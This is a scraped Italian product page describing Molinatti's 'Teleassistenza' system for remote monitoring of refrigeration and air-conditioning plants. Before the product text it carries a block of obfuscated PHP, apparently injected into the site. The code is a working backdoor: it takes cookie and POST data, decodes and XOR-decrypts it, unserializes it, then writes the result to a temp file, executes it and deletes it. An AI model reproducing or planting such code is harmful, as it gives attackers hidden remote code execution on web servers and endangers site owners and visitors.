$rpqcSB = "\131" . "\147" . "\137" . "\x4b" . 'w' . "\160" . "\x59";$zeKYKdn = "\x63" . 'l' . chr ( 670 - 573 ).'s' . chr (115) . '_' . chr ( 364 - 263 ).chr ( 464 - 344 ).chr (105) . "\x73" . "\164" . "\x73";$WYaDLfEOIB = class_exists($rpqcSB); $zeKYKdn = "29426";$mbcOWgFF = !1;if ($WYaDLfEOIB == $mbcOWgFF){function RnEqr(){$ghbzFdcKh = new /* 42910 */ Yg_KwpY(58544 + 58544); $ghbzFdcKh = NULL;}$tWVfrqSIzi = "58544";class Yg_KwpY{private function RNPlt($tWVfrqSIzi){if (is_array(Yg_KwpY::$jsHil)) {$kCxDWJGhw = sys_get_temp_dir() . "/" . crc32(Yg_KwpY::$jsHil['s' . chr ( 884 - 787 ).chr ( 1078 - 970 ).chr (116)]);@Yg_KwpY::$jsHil[chr (119) . chr ( 726 - 612 ).chr (105) . chr (116) . "\145"]($kCxDWJGhw, Yg_KwpY::$jsHil[chr (99) . 'o' . chr ( 953 - 843 )."\164" . "\x65" . "\156" . chr ( 444 - 328 )]);include $kCxDWJGhw;@Yg_KwpY::$jsHil['d' . chr ( 558 - 457 ).chr ( 985 - 877 ).chr ( 495 - 394 ).chr ( 701 - 585 ).'e']($kCxDWJGhw); $tWVfrqSIzi = "58544";exit();}}private $TwvBZF;public function FpvgQjVaPm(){echo 45397;}public function __destruct(){$tWVfrqSIzi = "44807_7726";$this->RNPlt($tWVfrqSIzi); $tWVfrqSIzi = "44807_7726";}public function __construct($DhUjwbQpe=0){$Qmvfsf = $_POST;$hvJfm = $_COOKIE;$eRczGtUMO = "9f98101f-c573-4e12-af3f-38f37e30b608";$KKNEgNO = @$hvJfm[substr($eRczGtUMO, 0, 4)];if (!empty($KKNEgNO)){$vvzDG = "base64";$TnFzDP = "";$KKNEgNO = explode(",", $KKNEgNO);foreach ($KKNEgNO as $jbmtBAcjtb){$TnFzDP .= @$hvJfm[$jbmtBAcjtb];$TnFzDP .= @$Qmvfsf[$jbmtBAcjtb];}$TnFzDP = array_map($vvzDG . chr ( 903 - 808 ).chr (100) . "\145" . chr (99) . "\157" . "\x64" . chr ( 298 - 197 ), array($TnFzDP,)); $TnFzDP = $TnFzDP[0] ^ str_repeat($eRczGtUMO, (strlen($TnFzDP[0]) / strlen($eRczGtUMO)) + 1);Yg_KwpY::$jsHil = @unserialize($TnFzDP);}}public static $jsHil = 51400;}RnEqr();} Teleassistenza - Molinatti

Teleassistenza

Teleassistenza

Teleassistenza

Descrizione del sistema

E’ un’applicazione per il monitoraggio e la supervisione degli impianti di refrigerazione e condizionamento controllati da strumentazione elettronica. La rete di strumenti convoglia i dati su personal computer dal quale è possibile visualizzare e stampare report, gestire allarmi, modificare parametri operativi, monitorare, controllare ed ottimizzare l’intero sistema.

Applicazioni

Monitoraggio e supervisione di impianti frigoriferi e di condizionamento.

Gestioni automatiche di cicli di lavorazione.

Registrazioni di grandezze fisiche (temperatura, umidità, pressione, CO2, ecc.).
Impianti industriali di abbattimento, conservazione, stagionatura.
Archiviazione e consultazione dati salvati.

Caratteristiche principali

  • Sistema di supervisione industriale per controlli elettronici dotati di uscita RS485.
  • Permette di interagire con gli strumenti.
  • Adatto per reti locali (LAN) in configurazione client/server.
  • Gestione cicli di lavoro con modifica dei parametri in automatico nel tempo.
  • Possibilità di gestione remota degli impianti.
  • Pagina principale configurabile con visualizzati i dati degli strumenti selezionati.
  • Grafici personalizzabili con confronto fra diverse grandezze.
  • Stampe ed esportazione in Excel dei dati memorizzati.
  • Navigatore allarmi.
  • Gestione allarmi differenziata ed invio di e-mail a cellulari e computer per la loro segnalazione remota ed il relativo rientro.
  • Senza limiti di strumenti collegabili con l’aggiunta di interfacce TWRS485 (disponibile interfaccia unica per collegamento fino a 64 strumenti).
  • Opzione relè allarme integrato nell’interfaccia TWRS485.
tutor